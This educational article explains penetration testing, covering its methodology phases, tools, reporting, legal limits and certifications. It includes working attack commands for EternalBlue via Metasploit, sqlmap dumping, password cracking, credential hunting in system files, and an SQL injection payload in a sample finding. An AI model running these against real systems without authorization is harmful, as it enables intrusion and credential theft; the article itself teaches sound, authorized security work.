What is Penetration Testing? The Discipline of Breaking Things Before Attackers Do
Penetration testing is authorized, structured hacking — finding vulnerabilities in systems, networks, and applications before real attackers do. Here's the full methodology, every phase of a real engagement, the tools professionals use, and how to build a career in it.
The question every organization eventually asks is: "We think our security controls work — but do they actually?" Firewalls, authentication systems, input validation, access controls — you can design them carefully, implement them correctly, and still have a gap that nobody noticed during development because nobody was actively trying to break through them.
Penetration testing is the answer to that question. It's authorized, structured hacking — real security professionals using the same tools, techniques, and mindset as malicious attackers to find vulnerabilities before those attackers do. The key word is authorized. The entire discipline exists on that distinction.
What Penetration Testing Is (And What It Isn't)
A penetration test (pentest) is a simulated attack against a target system, network, or application performed by a security professional with explicit written authorization from the system owner. The goal is to identify exploitable vulnerabilities, demonstrate real business impact, and provide actionable remediation guidance.
It is not the same as a vulnerability scan. Automated scanners run predetermined checks against known vulnerability signatures. They find what they're programmed to find. A penetration tester reads findings, chases threads, chains vulnerabilities together, pivots through systems, and demonstrates what an attacker could actually do — not just what the scanner flagged.
It is not the same as a security audit. An audit reviews configurations, policies, and processes against a standard. A pentest actively exploits.
It is not the same as bug bounty hunting, though the skills overlap. Bug bounty is ongoing, scope-defined vulnerability disclosure with financial rewards. A pentest is a time-boxed engagement with defined rules of engagement and a formal deliverable.
The authorization document — the Rules of Engagement (RoE) or Statement of Work — is the only thing that separates a penetration tester from a criminal. Without it, everything in this article describes illegal activity. Get it in writing before touching anything.
Why Organizations Do It
The regulatory and business drivers are substantial:
PCI DSS Requirement 11.4 mandates penetration testing for any organization that stores, processes, or transmits cardholder data. Annual external penetration tests and segmentation testing after significant infrastructure changes are required.
HIPAA requires organizations to conduct regular technical security reviews of their systems protecting electronic protected health information (ePHI).
SOC 2 Type II examinations increasingly include evidence of penetration testing as part of demonstrating security controls work in practice.
NIST SP 800-115 is the technical guide to information security testing and assessment for US federal agencies and contractors.
Beyond compliance: breaches are expensive. IBM's Cost of a Data Breach Report 2025 put the average breach cost at over $4 million. A penetration test costs a fraction of that. Organizations that test regularly find vulnerabilities in a controlled environment rather than discovering them via incident response.
The Types of Penetration Tests
External network penetration test — attacks your internet-facing infrastructure from outside the network perimeter. Web applications, VPNs, mail servers, DNS, public-facing services. This is what real attackers do first.
Internal network penetration test — simulates an attacker who has already gained a foothold inside the network, or a malicious insider. Tests lateral movement, privilege escalation, Active Directory attacks, internal service exploitation.
Web application penetration test — focused entirely on web application security: SQL injection, XSS, authentication failures, broken access control, business logic flaws, API security. Follows the OWASP Web Security Testing Guide methodology.
Social engineering assessment — tests the human layer. Phishing simulations, vishing (voice phishing), pretexting. Measures whether employees can be manipulated into disclosing credentials or installing malware.
Physical penetration test — attempts to physically breach facilities. Lock picking, tailgating, badge cloning, accessing server rooms or workstations.
Red team engagement — a full-scope, multi-phase simulation of a sophisticated attacker. No artificial limitations on techniques. May run for months. Measures the organization's ability to detect and respond, not just prevent.
Black box, white box, grey box:
- Black box: The tester starts with no information about the target, simulating an external attacker.
- White box: Full access to documentation, source code, architecture diagrams. Maximum coverage, most efficient.
- Grey box: Partial information — credentials for a standard user account, high-level architecture, but no source code. The most realistic simulation of an insider threat or credential-compromise scenario.
The Penetration Testing Methodology
The Penetration Testing Execution Standard (PTES) is the industry-standard framework for conducting professional penetration tests. It defines seven phases that cover every aspect of an engagement from initial scoping to final report delivery.
Phase 1: Pre-Engagement Interactions
Before touching a single system, everything must be documented and agreed upon in writing. This phase determines the scope, constraints, and legal framework of the engagement.
Scope definition: What systems are in scope? IP ranges, domain names, application URLs, office locations for physical testing. What is explicitly out of scope? Production databases that can't be disrupted? Third-party services the client doesn't own?
Rules of Engagement (RoE): What techniques are permitted? Are denial-of-service tests allowed? Can the tester use social engineering? Are there blackout windows when testing is prohibited (during a product launch, end-of-month financial processing)?
Authorization documentation: A signed contract or letter of authorization with explicit permission to test the defined scope. This is non-negotiable. Without it, you're committing crimes regardless of your intentions.
Communication protocols: Who is the primary contact if a critical vulnerability is found immediately? What's the escalation path if testing causes unintended disruption? How are findings communicated during the engagement?
Threat modeling: Who would realistically attack this target? A script kiddie scanning for low-hanging fruit? A nation-state APT with unlimited resources? A disgruntled ex-employee? The answer shapes what the tester focuses on.
Phase 2: Intelligence Gathering (Reconnaissance)
The tester collects as much information about the target as possible using only public sources — no active probing of the target systems yet. This is OSINT (Open Source Intelligence).
Passive reconnaissance tools:
# DNS enumeration — find subdomains, mail servers, name servers
# Using theHarvester to gather emails, subdomains, hosts
theHarvester -d target.com -b google,bing,linkedin,shodan -f output
# Subdomain enumeration
amass enum -d target.com -passive
subfinder -d target.com -silent
# WHOIS and DNS records
whois target.com
dig target.com ANY
dig target.com MX
dig target.com TXT # Often contains SPF records, sometimes secrets
# Certificate Transparency logs — find subdomains via SSL cert history
# crt.sh searches certificate transparency logs
curl "https://crt.sh/?q=%.target.com&output=json" | jq '.[].name_value' | sort -u
# Shodan — find internet-exposed services without scanning
shodan search hostname:target.com
shodan search org:"Target Company Name"
# Google Dorks — find sensitive content indexed by Google
site:target.com filetype:pdf
site:target.com intitle:"index of"
site:target.com "password" OR "credentials" filetype:txt
What you're building: A map of the attack surface. Domain names and subdomains. IP ranges. Technologies in use (what's running on those servers). Employee names and emails (for social engineering). Exposed services. Historical data that reveals old infrastructure.
Job postings are intelligence. "We're looking for a Senior Java developer with Spring Boot experience and familiarity with Jenkins, AWS, and PostgreSQL" tells a tester exactly what the internal stack looks like. LinkedIn employee profiles reveal org structure and tech stack. GitHub repositories from company employees sometimes contain credentials, internal documentation, and API keys committed by mistake.
Phase 3: Threat Modeling
With the intelligence gathered, the tester maps out the most likely attack paths. What are the high-value targets? What's the most realistic path to reach them? Where is the attack surface largest?
This phase documents the findings so far and prioritizes where to focus exploitation effort. A web application with a poorly protected admin panel is higher priority than a service on an obscure port. Active Directory is usually the crown jewel in enterprise environments — owning it means owning the network.
Phase 4: Vulnerability Analysis
Now the tester transitions from passive to active reconnaissance. Network scans, service enumeration, vulnerability scanning, web application mapping.
# Nmap — the standard network scanner
# Service and version detection, OS detection
nmap -sV -sC -O -A 10.10.10.0/24 -oN scan_output.txt
# Specific port ranges
nmap -p 80,443,8080,8443,3389,22 target.com -sV
# Aggressive scan with scripts
nmap -p- -T4 --script=vuln target.com
# Web application discovery
# Find directories and files
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
feroxbuster --url https://target.com --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
# Technology fingerprinting
whatweb https://target.com
wappalyzer (browser extension)
# Vulnerability scanning
nikto -h https://target.com # Web-specific vulnerability scanner
For web applications specifically, Burp Suite is the essential tool. It intercepts all HTTP traffic between your browser and the target, lets you modify requests, replay them, run automated scans, and test for the entire OWASP Top 10 interactively.
Burp Suite workflow:
1. Configure browser proxy → Burp Proxy (localhost:8080)
2. Browse the application manually — Burp captures all traffic
3. Review the Site Map to understand all endpoints and parameters
4. Run the active scanner against in-scope targets
5. Use Repeater to manually test parameters for injection, XSS, auth bypass
6. Use Intruder for brute force, fuzzing, parameter enumeration
The vulnerability analysis phase produces a list of potential vulnerabilities to attempt. The next phase tests whether they're actually exploitable.
Phase 5: Exploitation
This is where the actual attacks happen. The tester attempts to exploit the vulnerabilities identified in phase 4, chaining them when possible to maximize impact.
# Metasploit — the most comprehensive exploitation framework
msfconsole
# Search for a specific exploit
msf > search type:exploit ms17-010
msf > use exploit/windows/smb/ms17_010_eternalblue
msf > set RHOSTS 10.10.10.40
msf > set LHOST 10.10.14.1
msf > run
# Manual exploitation is often necessary
# SQL injection testing
sqlmap -u "https://target.com/item?id=1" --dbs --batch
sqlmap -u "https://target.com/item?id=1" -D target_db --tables
# Password attacks
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://target.com
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
Exploitation is not just about gaining access. It's about demonstrating business impact. An unauthenticated SQL injection that reads from the users table is a more compelling finding when you can show you extracted the admin credentials and logged in as admin than when you just list the database names.
Phase 6: Post-Exploitation
Once access is gained, the tester assesses what's reachable from that position and what the real-world impact would be.
# After getting a shell on a Linux box
# Privilege escalation
id && whoami # Current user context
sudo -l # What can I run as root?
find / -perm -4000 2>/dev/null # SUID binaries
cat /etc/crontab # Scheduled jobs running as root?
ls -la /home/ # Other users
cat /etc/passwd
# Linpeas — automated Linux privilege escalation checker
./linpeas.sh 2>/dev/null | tee linpeas_output.txt
# Network discovery from compromised host
ip route # What networks are reachable?
netstat -antup # Active connections
arp -a # Recent connections to other hosts
# Credential hunting
find / -name "*.conf" -readable 2>/dev/null
find / -name "*.env" -readable 2>/dev/null
grep -r "password" /etc/ 2>/dev/null
Lateral movement — using the compromised system as a jumping point to reach other systems. Credentials found in config files often work on other servers. SSH keys allow movement between systems. Active Directory authentication tickets can be stolen and reused.
Pivoting — routing traffic through a compromised host to reach internal networks that weren't directly accessible. A web server in the DMZ can become a pivot point to reach the internal database servers.
The goal is to answer: if an attacker gained this initial access, how far could they get? Could they reach the database? The backup server? The domain controller? Could they exfiltrate the entire customer database?
Phase 7: Reporting
The deliverable that justifies everything. A penetration test without a quality report is just unauthorized hacking. The report is what the client pays for.
Executive summary: 1-2 pages. What was tested, the overall risk posture, the most critical findings in plain business language. Written for C-suite and board-level readers who don't read technical details.
Technical findings: Each vulnerability gets its own entry:
- Severity: Critical/High/Medium/Low/Informational (usually CVSS-scored)
- Description: What the vulnerability is
- Evidence: Screenshots, HTTP requests/responses, extracted data, anything that proves exploitation succeeded
- Impact: What an attacker could do with this vulnerability
- Remediation: Specific, actionable steps to fix it
- References: CVE numbers, OWASP resources, vendor advisories
Example finding entry:
Title: Unauthenticated SQL Injection in Product Search Parameter
Severity: Critical (CVSS 9.8)
Description: The product search endpoint (/api/search?q=) is vulnerable to
error-based SQL injection. The parameter is passed directly to a SQL query
without sanitization or parameterization.
Evidence:
Request: GET /api/search?q=1'%20AND%20extractvalue(1,concat(0x7e,(SELECT%20version())))--
Response: XPATH syntax error: '~8.0.32-MySQL Community Server'
The database version was confirmed as MySQL 8.0.32. Further exploitation
confirmed read access to the user credentials table, including the following
extracted administrator hash: [hash redacted for this summary]
Impact: An unauthenticated attacker can read any data from the database,
including all user credentials, customer records, and payment information.
If the database user has FILE privileges (confirmed: yes), an attacker can
also read OS files and potentially achieve remote code execution.
Remediation:
1. Replace string-concatenated queries with parameterized statements
(PreparedStatement in Java, PDO in PHP, psycopg2's %s placeholders in Python)
2. Apply principle of least privilege: the database user the application
connects with should not have FILE, DROP, or other administrative privileges
3. Implement a WAF as a compensating control while remediation is in progress
References: OWASP A03:2025 – Injection, CWE-89, CVE-N/A (application-specific)
Legal and Ethical Framework
Get everything in writing. The authorization document must explicitly name the systems in scope, the testing window, and the authorized techniques. Verbal authorization is worthless.
Stay in scope. If you find a vulnerability that chains into an out-of-scope system, stop. Document the finding and report it, but don't pursue it without amended authorization. Scope creep is how authorized testers accidentally commit crimes.
Do not cause damage. Demonstrating that you can execute a denial-of-service attack is not the same as executing it against production systems. Demonstrating that you can delete the database is not the same as deleting it. Show impact, don't cause it.
Protect the data you access. If testing requires exfiltrating data to demonstrate impact, handle it professionally. Don't store real customer data on personal machines, don't transmit it over unencrypted channels, and delete it after the engagement.
Report critical findings immediately. If you find a critical vulnerability that puts real users at immediate risk, don't wait for the report. Pick up the phone.
Building a Career in Penetration Testing
The foundational certifications that actually matter to employers and clients:
OSCP (Offensive Security Certified Professional) — the gold standard entry-level offensive security certification. Requires passing a 24-hour hands-on exam where you exploit real machines in a network. No multiple choice. Pass by demonstrating you can actually hack. Offensive Security also offers OSEP (advanced evasion) and OSED (exploit development) at higher levels.
CEH (Certified Ethical Hacker) — EC-Council's certification. More theoretical than OSCP but widely recognized by HR departments and required for some government contracts. The exam is knowledge-based rather than hands-on.
eJPT (eLearnSecurity Junior Penetration Tester) — a good starting point if you're new. Genuinely hands-on, beginner-accessible, and a realistic introduction to the methodology.
PNPT (Practical Network Penetration Tester) — TCM Security's certification. Practical exam requiring a full pentest report, not just finding flags. Well-regarded in the community.
Practice platforms: HackTheBox, TryHackMe, PentesterLab, and PicoCTF provide legal, intentionally vulnerable environments for developing skills. HackTheBox is particularly aligned with what you'd encounter in actual OSCP preparation and real engagements.
The career path: Junior penetration tester → Penetration tester → Senior penetration tester → Lead/Principal → Red team lead → Director of offensive security. Entry-level roles typically require one or more certifications plus demonstrable skills (CTF writeups, bug bounty history, GitHub projects).
The field is in demand. Cybersecurity job openings consistently outnumber qualified applicants, and penetration testers command above-average salaries in the security field.